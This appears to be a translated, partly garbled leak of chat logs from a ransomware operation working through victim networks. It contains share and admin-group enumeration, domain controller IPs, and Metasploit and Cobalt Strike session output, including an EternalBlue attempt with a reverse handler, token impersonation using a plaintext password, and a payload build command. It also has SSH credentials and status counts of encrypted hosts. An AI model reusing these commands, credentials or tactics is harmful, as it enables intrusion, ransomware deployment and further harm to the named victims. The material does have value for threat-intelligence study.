\USCHI-DCP001.Hobbes.loc\IPC$ - Remote IPC \USCHI-DCP001.Hobbes.loc/NETLOGON - Logon server share \USCHI-DCP001.Hobbes.loc\SYSVOL - Logon server share \PCHIAPG014.Hobbes.loc\ActiveAdministrator - Active Administrator Server Share \PCHIAPG014.Hobbes.loc\ADMIN$ - Remote Admin \\{\PCHIAPG014.Hobbes.loc\BEW-4ecbc619f6de49a39b3bda9cec5b9074 - Push Directory \PCHIAPG014.Hobbes.loc\C$ - Default share \PCHIAPG014.Hobbes.loc\DADevicePolicyMaster$ - DADevicePolicyMaster$ share \PCHIAPG014.Hobbes.loc\E$ - Default share \PCHIAPG014.Hobbes.loc\IPC$ - Remote IPC \PCHIAPG014.Hobbes.loc\Logs$ - Logs$ share \PCHIAPG014.Hobbes.loc\SLDAClient$ - SLDAClient$ share \\PCHIAPG014.Hobbes.loc\Slogic$ - \PCHIAPG014\SLOGIC$ share \PCHIAPG014.Hobbes.loc\SLscripts$ - SLscripts$ share \PCHIWSG007.Hobbes.loc\ADMIN$ - Remote Admin \PCHIWSG007.Hobbes.loc\C$ - Default share \PCHIWSG007.Hobbes.loc\IPC$ - Remote IPC \USCHI-DCG003.Hobbes.loc\ADMIN$ - Remote Admin \USCHI-DCG003.Hobbes.loc\C$ - Default share \USCHI-DCG003.Hobbes.loc\IPC$ - Remote IPC \USCHI-DCG003.Hobbes.loc/NETLOGON - Logon server share \USCHI-DCG003.Hobbes.loc\SYSVOL - Logon server share \USCHI-BKP001.Hobbes.loc\ADMIN$ - Remote Admin \USCHI-BKP001.Hobbes.loc\C$ - Default share \USCHI-BKP001.Hobbes.loc\D$ - Default share \USCHI-BKP001.Hobbes.loc\E$ - Default share \USCHI-BKP001.Hobbes.loc\F$ - Default share \USCHI-BKP001.Hobbes.loc\G$ - Default share \USCHI-BKP001.Hobbes.loc\IPC$ - Remote IPC \USCHI-BKP001.Hobbes.loc\print$ - Printer Drivers \USCHI-PRT001.Hobbes.loc\ADMIN$ - Remote Admin \USCHI-PRT001.Hobbes.loc\C$ - Default share \USCHI-PRT001.Hobbes.loc\IPC$ - Remote IPC \USCHI-PRT001.Hobbes.loc\print$ - Printer Drivers \\Print$ - Plotters NAME should not contain "_" per vendor recommendation \\USCHI-PRT001.Hobbes.loc\USCHI-PL_OCECW300_PS - USCHI-PL_OCECW300_PS \USCHI-PRT001.Hobbes.loc\USCHI-PT_C5045 - South - Canon iR-ADV C5045/5051 PCL6 \USCHI-PRT001.Hobbes.loc\USCHI-PT_C5045_PS - South - Canon iR-ADV C50455051 PS3 
\USCHI-PRT001.Hobbes.loc\USCHI-PT_C5255 - North - Canon iR-ADV C5250/5255 PCL6 \USCHI-PRT001.Hobbes.loc\USCHI-PT_C5255_PS - North - Canon iR-ADV C52505255 PS3 \USCHI-PRT001.Hobbes.loc\USCHI-PT_HPCM3530 - South - HP Color LaserJet CM3530 \USCHI-PRT001.Hobbes.loc\USCHI-PT_HPCM3530_PS - South - HP Color LaserJet CM3530 PS \USCHI-PRT001.Hobbes.loc\USCHI-PT_HPCP3525 - HR Area - HP Color LaserJet CP3525 PCL6 \USCHI-PRT001.Hobbes.loc\USCHI-PT_HPCP3525_PS - HR Area - HP Color LaserJet CP3525 PS \USCHI-MAXD001.Hobbes.loc\ADMIN$ - Remote Admin \USCHI-MAXD001.Hobbes.loc\C$ - Default share \USCHI-MAXD001.Hobbes.loc\IPC$ - Remote IPC \USCHI-MAXD001.Hobbes.loc\M$ - Default share \USCHI-MSE003.Hobbes.loc\address - \USCHI-MSE003.Hobbes.loc\ADMIN$ - Remote Admin \USCHI-MSE003.Hobbes.loc\C$ - Default share \USCHI-MSE003.Hobbes.loc\E$ - Default share \USCHI-MSE003.Hobbes.loc\F$ - Default share \USCHI-MSE003.Hobbes.loc\G$ - Default share \USCHI-MSE003.Hobbes.loc\IPC$ - Remote IPC \USCHI-SQL001.Hobbes.loc\ADMIN$ - Remote Admin \USCHI-SQL001.Hobbes.loc\C$ - Default share \USCHI-SQL001.Hobbes.loc\E$ - Default share \USCHI-SQL001.Hobbes.loc\IPC$ - Remote IPC \USCHI-SQL001.Hobbes.loc\print$ - Printer Drivers \\Remote Admin $\DT-000037.Hobbes.loc\ADMIN$ - Remote Admin \DT-000037.Hobbes.loc\C$ - Default share \DT-000037.Hobbes.loc\IPC$ - Remote IPC \PCHIWSG006.Hobbes.loc\70182862-e52d-4fb0-bea2-3448c35de88f-query-0 - Used by Microsoft Search Server 2010 to copy index files between servers. 
\PCHIWSG006.Hobbes.loc\ADMIN$ - Remote Admin \PCHIWSG006.Hobbes.loc\C$ - Default share \PCHIWSG006.Hobbes.loc\IPC$ - Remote IPC \USCHI-MSE002.Hobbes.loc\address - \USCHI-MSE002.Hobbes.loc\ADMIN$ - Remote Admin \USCHI-MSE002.Hobbes.loc\C$ - Default share \USCHI-MSE002.Hobbes.loc\E$ - Default share \USCHI-MSE002.Hobbes.loc\F$ - Default share \USCHI-MSE002.Hobbes.loc\G$ - Default share \USCHI-MSE002.Hobbes.loc\IPC$ - Remote IPC \USCHI-DCG001.Hobbes.loc\ADMIN$ - Remote Admin \USCHI-DCG001.Hobbes.loc\C$ - Default share \USCHI-DCG001.Hobbes.loc\IPC$ - Remote IPC \USCHI-DCG001.Hobbes.loc/NETLOGON - Logon server share \USCHI-DCG001.Hobbes.loc\SYSVOL - Logon server share \\{\PCHIDCG004.Hobbes.loc\ADMIN$ - Remote Admin \PCHIDCG004.Hobbes.loc\C$ - Default share \PCHIDCG004.Hobbes.loc\IPC$ - Remote IPC \PCHIDCG004.Hobbes.loc\NETLOGON - Logon server share \PCHIDCG004.Hobbes.loc\slETL$ - \PCHIDCG004.Hobbes.loc\SYSVOL - Logon server share \USCHI-LSS001.Hobbes.loc\ADMIN$ - Remote Admin \USCHI-LSS001.Hobbes.loc\C$ - Default share \\Extreme Loading_for_Structures - Extreme Loading┬" for Structures \USCHI-LSS001.Hobbes.loc\IPC$ - Remote IPC \USCHI-SPS001.Hobbes.loc/ADMIN$ - Remote Admin \\USCHI-SPS001.Hobbes.loc\Analytics_8bda09f0-8cbc-4c38-8854-922eb0553239 - \USCHI-SPS001.Hobbes.loc\C$ - Default share \USCHI-SPS001.Hobbes.loc\E$ - Default share \\USCHI-SPS001.Hobbes.loc\gthrsvc_8bda09f0-8cbc-4c38-8854-922eb0553239-crawl-0 - Crawled Files Share8bda09f0-8cbc-4c38-8854-922eb0553239-crawl-0 \USCHI-SPS001.Hobbes.loc\IPC$ - Remote IPC \USCHI-NWA001.Hobbes.loc\ADMIN$ - Remote Admin \USCHI-NWA001.Hobbes.loc\C$ - Default share \USCHI-NWA001.Hobbes.loc\E$ - Default share \USCHI-NWA001.Hobbes.loc\IPC$ - Remote IPC \USCHI-NWA001.Hobbes.loc\KC$ - \USCHI-NWA001.Hobbes.loc\Netwrix_Auditor_Subscriptions$ - This is a default share for uploading Netwrix Auditor subscriptions. \USCHI-NWA001.Hobbes.loc\Netwrix_UAVR$ - This share contains audit data on user activity collected by Netwrix Auditor. 
\USCHI-NWA001.Hobbes.loc\print$ - Printer Drivers \\Prints$ - Remote Admin \LT-000108.Hobbes.loc\C$ - Default share \LT-000108.Hobbes.loc\IPC$ - Remote IPC \USCHI-VHH010.Hobbes.loc\ADMIN$ - Remote Admin \USCHI-VHH010.Hobbes.loc\C$ - Default share \USCHI-VHH010.Hobbes.loc\E$ - Default share \USCHI-VHH010.Hobbes.loc\IPC$ - Remote IPC \PCHIDCG003.Hobbes.loc\ADMIN$ - Remote Admin \PCHIDCG003.Hobbes.loc\C$ - Default share \PCHIDCG003.Hobbes.loc\IPC$ - Remote IPC \PCHIDCG003.Hobbes.loc\NETLOGON - Logon server share \PCHIDCG003.Hobbes.loc\slETL$ - \PCHIDCG003.Hobbes.loc\SYSVOL - Logon server share \\{\PCHIAPG011.Hobbes.loc\ADMIN$ - Remote Admin \PCHIAPG011.Hobbes.loc\C$ - Default share \PCHIAPG011.Hobbes.loc\IPC$ - Remote IPC \PCHIAPG011.Hobbes.loc\Lenel$ - \USCHI-PWA001.Hobbes.loc\ADMIN$ - Remote Admin \USCHI-PWA001.Hobbes.loc\C$ - Default share \USCHI-PWA001.Hobbes.loc\E$ - Default share \USCHI-PWA001.Hobbes.loc\F$ - Default share \USCHI-PWA001.Hobbes.loc\G$ - Default share \USCHI-PWA001.Hobbes.loc\H$ - Default share \USCHI-PWA001.Hobbes.loc\IPC$ - Remote IPC \\ClusterStorage$ - Cluster Shared Volumes Default Share \DAG01.Hobbes.loc/IPC$ - Remote IPC \\{\DT-000033.Hobbes.loc\A$ - Default share \DT-000033.Hobbes.loc\ADMIN$ - Remote Admin \\{\DT-000033.Hobbes.loc\C$ - Default share \DT-000033.Hobbes.loc\IPC$ - Remote IPC \SQL0005.Hobbes.loc\ActiveInk - \SQL0005.Hobbes.loc\ADMIN$ - Remote Admin \\SQL0005.Hobbes.loc\C$ - Default share \\SQL0005.Hobbes.loc\E$ - Default share \SQL0005.Hobbes.loc\F$ - Default share \\SQL0005.Hobbes.loc\G$ - Default share \SQL0005.Hobbes.loc\IPC$ - Remote IPC \\SQL0005.Hobbes.loc\Temp - \USCHI-WSUS001.Hobbes.loc\ADMIN$ - Remote Admin \USCHI-WSUS001.Hobbes.loc\C$ - Default share \USCHI-WSUS001.Hobbes.loc\E$ - Default share \USCHI-WSUS001.Hobbes.loc\IPC$ - Remote IPC \USCHI-WSUS001.Hobbes.loc\UpdateServicesPackages - A network share to be used by client systems for collecting all software packages (usually applications) published on this WSUS 
system. \USCHI-WSUS001.Hobbes.loc\WsusContent - A network share to be used by Local Publishing to place published content on this WSUS system. \USCHI-WSUS001.Hobbes.loc\WSUSTemp - A network share used by Local Publishing from a Remote WSUS Console Instance. \USCHI-NET002.Hobbes.loc\ADMIN$ - Remote Admin \USCHI-NET002.Hobbes.loc\AdminUIContentPayload - AdminUIContentPayload share for AdminUIContent Packages \USCHI-NET002.Hobbes.loc\C$ - Default share \USCHI-NET002.Hobbes.loc\Client - \USCHI-NET002.Hobbes.locD - \USCHI-NET002.Hobbes.loc\DeploymentShare$ - MDT Deployment Share \USCHI-NET002.Hobbes.loc\Drivers - \USCHI-NET002.Hobbes.loc\E$ - Default share \\EasySetupPayload - EasySetupPayload share for EasySetup Packages \USCHI-NET002.Hobbes.locF \USCHI-NET002.Hobbes.loc\F$ - Default share \USCHI-NET002.Hobbes.loc\ImagesFiles - \USCHI-NET002.Hobbes.loc\IPC$ - Remote IPC \USCHI-NET002.Hobbes.loc\print$ - Printer Drivers \USCHI-NET002.Hobbes.loc\REMINST - RemoteInstallation \USCHI-NET002.Hobbes.loc\SCCMContentLib$ - 'Configuration Manager' Content Library for site CHI (3/6/2015) \USCHI-NET002.Hobbes.loc\SMPSTOREF_63F684E9$ - SMS SMP Share \USCHI-NET002.Hobbes.loc\SMSPKGF$ - SMS Site CHI DP 3/6/2015 \USCHI-NET002.Hobbes.loc\SMSSIG$ - SMS Site CHI DP 3/6/2015 \USCHI-NET002.Hobbes.loc\SMS_CHI - SMS Site CHI 09/21/20 \USCHI-NET002.Hobbes.loc\SMS_CPSC$ - SMS Compressed Package Storage \USCHI-NET002.Hobbes.loc\SMS_DP$ - ConfigMgr Site Server DP share \USCHI-NET002.Hobbes.loc\SMS_OCM_DATACACHE - OCM inbox directory \USCHI-NET002.Hobbes.loc\SMS_SITE - SMS Site CHI 09/21/20 \\SITE - SMS Software Update Installation Agent -- 09/21/20 \USCHI-NET002.Hobbes.loc\SourceFiles - \USCHI-BKP110.Hobbes.loc\ADMIN$ - Remote Admin \USCHI-BKP110.Hobbes.loc\C$ - Default share \USCHI-BKP110.Hobbes.loc\E$ - Default share \USCHI-BKP110.Hobbes.loc\F$ - Default share \USCHI-BKP110.Hobbes.loc\G$ - Default share \USCHI-BKP110.Hobbes.loc\IPC$ - Remote IPC \USCHI-BKP110.Hobbes.loc\VBRCatalog - 
\USCHI-CAS001.Hobbes.loc\ADMIN$ - Remote Admin \USCHI-CAS001.Hobbes.loc\C$ - Default share \USCHI-CAS001.Hobbes.loc\CertEnroll - Active Directory Certificate Services share \USCHI-CAS001.Hobbes.loc\IPC$ - Remote IPC \USCHI-SBS001.Hobbes.loc\ADMIN$ - Remote Admin \USCHI-SBS001.Hobbes.loc\C$ - Default share \USCHI-SBS001.Hobbes.loc\IPC$ - Remote IPC \USCHI-SBS001.Hobbes.loc/SkypeShare - \USCHI-SBS001.Hobbes.locSkypeShare1 - \USCHI-SBS001.Hobbes.loc/Users - \USCHI-SBS001.Hobbes.loc\xds-replica - Share used for Skype for Business Server replication \USCHI-SBS002.Hobbes.loc\ADMIN$ - Remote Admin \USCHI-SBS002.Hobbes.loc\C$ - Default share \USCHI-SBS002.Hobbes.loc\IPC$ - Remote IPC \USCHI-EM-LT400.Hobbes.loc\ADMIN$ - Remote Admin \USCHI-EM-LT400.Hobbes.loc\C$ - Default share \USCHI-EM-LT400.Hobbes.loc\IPC$ - Remote IPC \DT-000025.Hobbes.loc\A$ - Default share \DT-000025.Hobbes.loc\ADMIN$ - Remote Admin \\{\DT-000025.Hobbes.loc\C$ - Default share \DT-000025.Hobbes.loc\IPC$ - Remote IPC \DT-000025.Hobbes.loc\print$ - Printer Drivers \USCHI-SBS003.Hobbes.loc\ADMIN$ - Remote Admin \USCHI-SBS003.Hobbes.loc\C$ - Default share \USCHI-SBS003.Hobbes.loc\IPC$ - Remote IPC \USCHI-SBS003.Hobbes.loc\print$ - Printer Drivers `````` Alias name Administrators Comment Members ------------------------------------------------------------------------------- Administrator HOBBES\AdamsK HOBBES\Domain Admins HOBBES\ITSUPPORT HOBBES\IT-WKSTN-SUPP HOBBES\PCADMIN ``confuconfuconfuconfucon@tl1'' Group name Enterprise Admins Comment Designated administrators of the enterprise Members ------------------------------------------------------------------------------- DILBERT MS-0001 RAMIREZJ SPS19-Admin SPS-DB-2019 SPS-TS-2019 SVC-NWA001 ``` ``` Domain Controllers: Server Name IP Address ----------- ---------- PCHIDCG003 10.20.32.100 PCHIDCG004 10.20.32.28 USCHI-DCP001 10.20.32.175 USCHA-DCG002 10.6.0.56 USCHI-DCG003 10.20.32.103 USCHI-DCG001 10.20.32.101 PCHIDCG002 10.111.2.20 `````` Group name Domain 
Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- DILBERT ePOScan Exchange Service LaiP MITORATJ MS-0001 PCHIAPG009 PCHIAPG014 PCHIDBG001 RAMIREZJ SAVDeploy SCCMadmin SCOMaction SLADMIN SPS19-Admin SPS-DB-2019 SPS-TS-2019 SQL0005 SVC-CAS SVC-ESRI SVC-NWA001 SVC-PW-DBG001 SVC-PWORCHFWK SVC-PW-ORCHFWK SVC-PWPWD001 SVC-Veeam TAGGESE USCHIPWA001 USCHIPWD001 USCHIPWW001
AdFind gowconf expFederal.com
And also without a domain, one more session came there, even with lou. All know the rules: write logins in the personal for admin
bilder shelkodavo login
another session, then look for vpn
domain not available
I have another session hanging in the cob
who took off the ad info?
```
> getsystem
[-] 2001: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
meterpreter > [*] 10.0.0.115 - Meterpreter session 7 closed.  Reason: Died
```
failed to work from the input, though my domain is pinged from there; those sessions are not flying in the cobwebs; give me the domain; remove the ad user + as I see it passed to myself; get that grid from the cobwebs together with @user3
nu, elevate the exploit will work and bypass uac - no, through elevate
@user7 once managed to get up, not luckily, it's understandable
Tried a bunch of bypassuacs - all swear like this:
```
when the current user is not in a local admin group there is no point in trying to bypass uac
```
+
```
beacon> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 257 bytes
```
Domain still not resolved?
http://citrixen.peptide.cn/citrix/xenapp/auth/login.aspx
Win Serv 2008. All users who have creds are on the same computer. LA is not among them.
Domain is not responding
No VPN configs
No char
No creds in txt or other
There is no vulnerability on MS17:
```
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 173.234.155.45:9875
[*] 192.168.1.190:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[*] 192.168.1.190:445 - Scanned 1 of 1 hosts (100% complete)
[-] 192.168.1.190:445 - Exploit aborted due to failure: not-vulnerable: Set ForceExploit to override
[*] Exploit completed, but no session was created.
```
I ran it through the multi/handler to Meterpreter: `getsystem` - bypassed
Tried a bunch of bypassuacs - all swear like this: `Not in admins group, cannot escalate with this module`
Or it goes like this: `not-vulnerable: Target is not vulnerable`
I tried this (This module attempts to exploit existing administrative privileges to obtain a SYSTEM session). Didn't help much either:
```
msf6 exploit(windows/local/service_permissions) > exploit
[*] Trying to add a new service...
[*] Trying to find weak permissions in existing services...
[*] [CitrixICAFileSigningService] Cannot reliably determine path: "C:\Program Files (x86)\Citrix\DeliveryServices\ICAFileSigningService\Citrix.DeliveryServices.ICASign.ServiceHost.exe"
[*] [Citrix_GTLicensingProv] Cannot reliably determine path: "C:\Program Files (x86)\Citrix\Licensing\LicWMI\Citrix_GTLicensingProv.exe"
[+] [HipsDaemon] Write access to C:\Program Files (x86)\Huorong\Sysdiag\bin\HipsDaemon.exe
[+] [knbcenter] Write access to D:\Program Files (x86)\liebao\liebao\6.5.115.18480\KNBCenter.exe
[*] [TermServLicensing] Cannot reliably determine path: C:\Windows\system32\svchost -k TSLicensing
```
Mother won't appreciate it
I was talking about logins, passwords, names, comments, files
nope. You were talking about logins, no passwords.
Will there be any more?[ ](https://mediaeveryone.com/channel/general?msg=HJkjZDuH55qPtgNXX) how the fuck did I say? Take 3 sessions to 1 setcada@tl1 parsing sessions? Password change passwd`` 23.106.160.50 p17464 pwd:Lukashenko228! you have to do it every time you go in ssh/usr/bin/bash useradd -m username --shell "shell path" && passwd username ``password set``? create a sheet of your own for now.... Are you serious... i must have tried before you write and when you specify explicitly need to write along with the useradd -m -d /home/user3 user name, it creates itself in /home when you specify the directory do not need to write the full path possible centOS or pure Deb there is no such a fuck up not understand what with vds i create usera with explicit directory specify useradd -m -d /home/user3 user3 I'm logged out in a new terminal and see this ```. * Ubuntu 20.04 LTS is out, raising the bar on performance, security, and optimisation for Intel, AMD, Nvidia, ARM64 and Z15 as well as AWS, Azure and Google Cloud. https://ubuntu.com/blog/ubuntu-20-04-lts-arrives 0 updates can be installed immediately. 0 of these updates are security updates. $ hole -sh: 1: holes: not found $ ls $ ``` I specify mkhomedir_helper user3 does not work either. I check cat /etc/passwd `` user3:x:1000:1000::/home/user3:/bin/sh ``Waiting for sessions, disassembling, working. 206.221.186.34:44482 pqtbjTVtIMYBudInFs7VVVoZDHjDvqtAR1v ``Current postpone other than @user4 so move onokayshob do not get lost can a separate channel for feedback ?on the additional modules - link + reason / descriptionNecessary to make that commands collected kerbs, out of the box worked smbauto brut, was able to download files, one command remove the addfind, one command output da, da, and other things. 
This is at least
PowerView.ps1
what kind of preview?
more specifically, links to git and other stuff that would raise the privileges
links and stuff, what is necessary
mostly bugs, okay
++No way to download files from the client pc; in ptn it downloaded (see Download Files), but there is no download (opens a new tab - server not found). I would like to import scripts directly from the PC to the Ptsh, rather than via a link. Problems with sockets - it comes in two or three sessions. If you work in one session, you write a command, but it is duplicated two or three times, the same number of sessions flew in... Well, the built-in toolkit could be richer... in coba it is less frequent by far, it is hardly a complaint about the tool, coba in ass conditions also often dies or does not knock) very often sessions die, which is a minus)))) there is also a files button.... mmm vt it's blueada, i couldn't find it either until they said there's a button. visible bug
about the line at the top? nothing more to say. I'd like a normal panel, not a white rectangle.
give feedback status, write to the confab at once
yesterday check them again? check all sisd servers + availability
on what? check all the servers sisd.petya probably..
who's free now? set up for msf-deploy your arma there and work together. today will have to suffer.
One for all is not an option. The entire subnet gets pulled into the armoue if you scan.
+ will be a hassle if you work at the same time in the arm still in msf nu since the time you have gained experience so you can try again) I do not remember, we originally had one for all was...and what was it that worked in turns in what? so like will conflict, if the crowd there also fell off so one for all. all who need to replace the old one in the sense of it for one? do not forget to remove inactive sessions behind you? ``ShellConcatination --source=shellStarter_llvm_x64.dll -keep --target=pl64.dll --addBin=plbin`` this is how you built, pyload x64 check the system bit type x86 ? how did you build and run ? if all went well the domain authorization should have died why ? beacon> ls \\admindc1\c$ [*] Tasked beacon to list files in \admindc1\c$ [+] host called home, sent: 31 bytes [*] Listing: \admindc1\c$$ Size Type Last Modified Name ---- ---- ------------- ---- dir 07/10/2020 08:19:50 $Recycle.Bin dir 12/08/2020 23:30:15 AdminDC1 dir 12/08/2020 23:30:15 batch dir 12/08/2020 23:30:15 ck-agent dir 10/26/2018 09:36:07 Documents and Settings dir 12/08/2020 23:30:15 inetpub dir 12/08/2020 23:30:16 logs dir 12/09/2020 12:27:52:52 MSI dir 10/26/2018 13:40:56 PerfLogs dir 12/08/2020 23:30:16 Program Files dir 12/09/2020 02:24:43 Program Files (x86) dir 12/08/2020 23:30:16 ProgramData dir 12/08/2020 23:30:16 Recovery dir 12/08/2020 23:30:10 System Volume Information dir 10/12/2020 15:18:46 temp dir 12/08/2020 23:30:16 Users dir 12/02/2020 03:33:28 Windows dir 12/08/2020 23:30:16 Zabbix_Agent 1kb fil 12/08/2020 23:30:15 AdminDC1.admin.sisd.k12_admindc1(8).req.HWOEU 1kb fil 12/08/2020 23:30:15 admindc1.cer.HWOEU 375kb fil 07/16/2016 07:18:08 bootmgr 535b fil 12/08/2020 23:30:15 BOOTNXT.HWOEU 16gb fil 11/13/2020 07:53:40 pagefile.sys 1kb fil 12/08/2020 23:30:15 readme.txt 40mb fil 12/09/2020 08:06:26 redcloak.msi 
Checked 3 everywhere is the riddimi, but check something nearby under the creed DAOK) all or those who have a jam on the current? A long time we have not been with you this format) you have about 1.5 hours to work on the current, then give access to the cobu and from there we will again sort out the work. 
ridd is and check the root of the disk Snetu I have, everything is empty, cleared recently kobuodnaa do you have many live sessions in sisd? judging by the chinese cmd far traffic flies) session by the way at slip 5 response minutes have not tried all past or not tried? other than ms17? now i will try to scan this computer for ms17 > none of them is LA, no creds here? i wrote on the lpe direction that? in general here are all users on one computer, none of them is not LA, domain is not responding, configs no ipn, no ball, no crap spoka no question - can coba clean up sisd.net sessions? octe who asked for vps under the msf - in the afternoon if there are no questions, then proceed to work good afternoon Hi okay) several random checked - daridmi appeared on the armies? 
Servers Total servers on hell - 69 Alive - 50 Closed - 47 (no disks, ball, 3389) Sphere - snapshots are worn out Armies Total for Hell - 322 Alive - 140 Closed - 118 ``put the final status of the last message on the armies kst appeared) 1.done.korbel.com@tl1 close here all right what we could - done - is finished already everything) yes I think that's it Finish if there is anything alive and DK died network most likely by ls Before they fell off, there was a note everywhere. Teemo[COLODC1]daniel.harvey_adm */3192|2020Dec23 05:03:27> make_token KORBEL\ben.mandeville 1234qwerASDF!@#$ [*] Tasked beacon to create a token for KORBEL\ben.mandeville [+] host called home, sent: 56 bytes [+] Impersonated KORBEL\daniel.harvey_adm Teemo[COLODC1]daniel.harvey_adm */3192|2020Dec23 05:03:34> ls \10.10.13.14\C$ [*] Tasked beacon to list files in \10.10.13.14\C$ [+] host called home, sent: 34 bytes [-] could not open \10.10.13.14\C$\*: 53 ``at the very least psek``) just in case chekdat is not available, vmik won't work eithera vmik?) that's what doesn't work) tasklist /v /s hostit depends, I thought the process just you see all drives under the tokenlse how to check?) vmik does not work to get to the network available shard and i think you can run from dk also under the context of the LIVE domain admin then double-check the servers where is "up" where not ) i pinged random - all are available)) want to sleep already? beacon> shell ping -n 10.10.1.24 [*] Tasked beacon to run: ping -n 10.10.1.24 [+] host called home, sent: 49 bytes [+] received output: IP address must be specified. Do a repin on the servers, for example, to see what's going on, look with DK where there are alive cars and DK alive is not there are sessions on the servers alive or kobu blew out)or cut the traffic on the cobalt it all) they turned off the network like that)echo 1 > Z:\test.txt? 
and yes, recheck all servers where sessions died quickly as if not available for writing under the context I don't get it, context access is there but for some reason the envelope is hanging so it's not writable by the way, will dir Z:\ work? will it work with a direct quote? will it fail? remap 1 and that's right :thinking:`` ls \10.10.1.181\c$ [*] Tasked beacon to list files in \10.10.1.181\c$ [+] host called home, sent: 34 bytes [*] Listing: \\10.10.1.181\c$\ Size Type Last Modified Name ---- ---- ------------- ---- dir 10/20/2020 14:28:47 $Recycle.B How was the request now? Maybe because after dk encryption the authorization broke and the token went off? beacon> shell net use [*] Tasked beacon to run: net use [+] host called home, sent: 38 bytes [+] received output: New connections will be remembered. Status Local Remote Network ------------------------------------------------------------------------------- Unavailable Y: \10.10.1.181\c$ Microsoft Windows Network Unavailable Z: \10.10.15.10\c$ Microsoft Windows Network The command completed successfully. beacon> ls \10.10.1.181!{\c$ [*] Tasked beacon to list files in \10.10.1.181\c$ [+] host called home, sent: 34 bytes [*] Listing: \\10.10.1.181\c$\ Size Type Last Modified Name ---- ---- ------------- ---- dir 10/20/2020 14:28:47 $Recycle.Bin dir 10/20/2020 20:38:31 Documents and Settings dir 12/16/2020 12:05:24 inetpub dir 10/20/2020 15:46:32 PerfLogs dir 11/30/2020 13:30:25 Program Files dir 11/30/2020 13:30:26 Program Files (x86) dir 12/22/2020 12:41:05 ProgramData dir 10/20/2020 20:38:33 Recovery dir 11/17/2020 15:49:30 SFTP_Root dir 10/20/2020 14:04:21 System Volume Information dir 10/29/2020 16:00:15 Users dir 11/30/2020 13:21:42 Windows 380kb fil 02/02/2018 10:37:03 bootmgr 1b fil 07/16/2016 06:18:08 BOOTNXT 2gb fil 12/21/2020 13:05:39 pagefile.sys is the host available at all? 
as if under a different context they are unavailable for some reason they are hanging I mean servers if suddenly so mb haven't gotten there yet? both with no note Z / YY there are 2 disks mapped on the host SQL only mapped disk backups saturated? checked everywhere ls C:\ did you check the rdmi? drew servers, mapped arms, made dllinjelda everything ok?? so you unloaded everything, masked it and ran it? still pranking on the anchor? well ok yeah they're not up to date on the enrichment 4.2? ``` 10.10.1.61 - 10.10.1.6 - 10.10.1.60 - ``` coban this 10.10.1.60 portscan doesn't even give out that it's alive when i look into cobalt access and give me the IPs of these 3 servers that are not pulling and no ports please and 445 135 139 are some open there? yes, it's kb-temperature.korbel.com ``` >operatingSystem: Windows Server 2016 Standard ``` Arms. ``` 10.10.32.177 - Lost = 4 (100% loss) 10.10.17.28 - Lost = 4 (100% loss) 10.10.32.161 - Lost = 4 (100% loss) 10.10.1.50 - Destination host unreachable 10.10.1.129 - Destination host unreachable 10.20.1.30 - Destination host unreachable ``` Server ``` 10.10.1.60 - Destination host unreachable ``` ``` 3 no disks, ball,3389 ``` are these really wind servers? ``` Servers Total servers in hell - 69 Alive - 50 Closed - 47 ( 3 have no disks, ball, 3389) Sphere - snapshots are worn out Armies Total for Hell - 322 Alive - 140 Closed - 118 ``` All, finished. ``` Teemo[KORBELDC1]SYSTEM */464|2020Dec23 04:28:53> net share \\10.10.13.14 [*] Tasked beacon to run net share on 10.10.13.14 [+] host called home, sent: 105058 bytes [+] received output: Shares at \10.10.13.14: Share name Comment ---------- ------- ADMIN$ Remote Admin C$ Default share D$ Default share IPC$ Remote IPC print$ Printer Drivers ``` So the roadmap has actions on this. 
10.10.1.6 - 10.10.13.14 - 10.10.1.61 - ``` no servos are pulled in or mapped ``` 10.10.1.65 - 10.10.32.157 - 10.10.16.58 - 10.10.1.20 - 10.20.1.24 - 10.10.17.63 - ``` and these aren't mapping @user4 @user3 @user7 @user8 Army thanks)) would be great to remove the dll? ok @user9 please also remove the dll that was thrown here by ``COGNOSPD`` user4 ``snapshots``, but that's for later, I'd add info about drop backups by the way. All right) not yet) if it is less than 100, we pull in one do not need from you kobu what do I do? ``)) @user9 requested not there)`` Stopdanova? What is that? Exactly? @tl1 can't get on the ddick ``` Teemo[ATSALES_RL_LAP]rlawrence/3100|2021Jan29 20:53:18> shell systeminfo [*] Tasked beacon to run: systeminfo [+] host called home, sent: 41 bytes [+] received output: Host Name: ATSALES_RL_LAP OS Name: Microsoft Windows 10 Pro OS Version: 10.0.19041 N/A Build 19041 OS Manufacturer: Microsoft Corporation OS Configuration: Member Workstation OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: Product ID: 00330-50315-96784-AAOEM Original Install Date: 11/10/2020, 7:18:46 PM System Boot Time: 1/27/2021, 1:42:15 PM System Manufacturer: LENOVO System Model: 80SX System Type: x64 based PC Processor(s): 1 Processor(s) Installed. 
[01]: Intel64 Family 6 Model 78 Stepping 3 GenuineIntel ~1800 Mhz BIOS Version: LENOVO 0ZCN41WW, 9/15/2017 Windows Directory: C:\WINDOWS System Directory: C:WINDOWS\system32 Boot Device: \Device\HarddiskVolume1 System Locale: en-us;English (United States) Input Locale: en-us;English (United States) Time Zone: (UTC-07:00) Mountain Time (US & Canada) Total Physical Memory: 5.864 MB Available Physical Memory: 1.787 MB Virtual Memory: Max Size: 9,576 MB Virtual Memory: Available: 3,440 MB Virtual Memory: In Use: 6,136 MB Page File Location(s): C:\pagefile.sys Domain: AT.LOCAL Logon Server: \ATSALES_RL_LAP Hotfix(s): 7 Hotfix(s) Installed. [01]: KB4586876 [02]: KB4577266 [03]: KB4580325 [04]: KB4586864 [05]: KB4593175 [06]: KB4598481 [07]: KB4598242 Network Card(s): 3 NIC(s) Installed. [01]: Qualcomm Atheros QCA9377 Wireless Network Adapter Connection Name: Wi-Fi DHCP Enabled: Yes DHCP Server: 192.168.0.1 IP address(es) [01]: 192.168.0.17 [02]: Realtek PCIe GBE Family Controller Connection Name: Ethernet Status: Media disconnected [03]: Bluetooth Device (Personal Area Network) Connection Name: Bluetooth Network Connection Status: Media disconnected Hyper-V Requirements: VM Monitor Mode Extensions: Yes Virtualization Enabled In Firmware: No Second Level Address Translation: Yes Data Execution Prevention Available: Yes 